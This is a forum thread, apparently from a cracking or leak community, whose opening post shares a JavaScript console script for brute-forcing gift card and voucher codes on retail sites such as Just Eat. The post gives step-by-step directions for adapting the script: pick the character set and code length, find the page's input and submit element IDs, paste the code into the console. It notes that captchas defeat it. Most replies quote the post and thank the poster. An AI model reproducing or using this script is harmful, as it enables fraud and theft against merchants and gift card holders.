null0048 7 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [hide] Let's take Just Eat as example Change the giftcard type/range to generate (alphanumeric/number only/letter only). Change the max length of the possible input. Then inspect element the input box and the submit button to get the variable names. https://prnt.sc/nz874m and replace it in the code like this... https://prnt.sc/nz87ir After that, just paste the code in the console and click on Enter. DEMO: https://imgur.com/a/TY93qcw [/hide] [hide] alert("Leaked by Null0048 - can't remeber from where lol"); var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc") function makeid() { var text = ""; var possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //enter the variables of the gift card *CAN BE CASE SENTITIVE DEPENDING ON THE GC* for (var i = 0; i < 14; i++) //change the value depending on the length of the giftcard code text += possible.charAt(Math.floor(Math.random() * possible.length)); return text; } function main() { document.getElementById("INPUTBOXNAME").value = makeid(); document.getElementById("SUBMITBUTTONNAME").click(); } setInterval(function() { main(); }, speed); [/hide] [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] 1 Quote Share this post Link to post Share on other sites
spaceley 1 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] Would it actually work tho ? lets try it out! :) Quote Share this post Link to post Share on other sites
iptv4me 0 Looks pretty cool, thanks for the share man!! Quote Share this post Link to post Share on other sites
iModz 0 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] thanks alot man Quote Share this post Link to post Share on other sites
badthings 1 thanks man i believe it will work. thanks bro Quote Share this post Link to post Share on other sites
zivifl 3 GIFTCARD GENERATOR + CHECKER | ANY SITE GIFTCARD GENERATOR + CHECKER | ANY SITE Quote Share this post Link to post Share on other sites
298484 0 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] Approved ! bro Quote Share this post Link to post Share on other sites
popup23 1 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] tysm 10charssssssssss 1 Quote Share this post Link to post Share on other sites
notTurtwig 1 GIFTCARD GENERATOR + CHECKER Works with voucher codes and Bruteforce ANY Giftcard with a simple webscript *NO DOWNLOAD* *REALLY HIGH CPM* I had this script for a while now, and i decided to share it with all of you. I haven't coded the script, I'm just sharing it. I'm not responsible for any temporary IP ban nor any account limitation you might encounter. NOTE: won't work if there's a captcha or image verifiaction [align=center]HELP ME GROWING BY LEAVING A LIKE LIKE LIKE IT'S JUST A CLICK! LEECHERS WILL BE BANNED [/align] thanks :feelsgood: :feelsgood: :feelsgood: Quote Share this post Link to post Share on other sites